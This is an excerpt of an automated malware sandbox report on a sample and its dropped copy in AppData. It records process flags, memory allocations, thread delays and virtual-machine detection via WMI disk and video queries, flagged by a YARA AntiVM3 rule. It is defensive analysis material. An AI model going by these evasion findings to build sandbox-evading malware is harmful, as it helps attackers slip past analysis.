Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 7F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 23F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 43F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 4B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 5B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 5C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 6C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 9F50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: AF50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: B3E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: C3E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Memory allocated: 2B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: E80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 2C30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 2B50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 5260000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 6260000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 6390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 7390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: A050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: B050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: B4E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 14A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 3280000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Memory allocated: 2FC0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5422	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5754	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Window / User API: threadDelayed 2557	Jump to behavior
Source: C:\Users\user\Desktop\nzLoHpgAln.exe	Window / User API: threadDelayed 3970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe	Window / User API: threadDelayed 1147
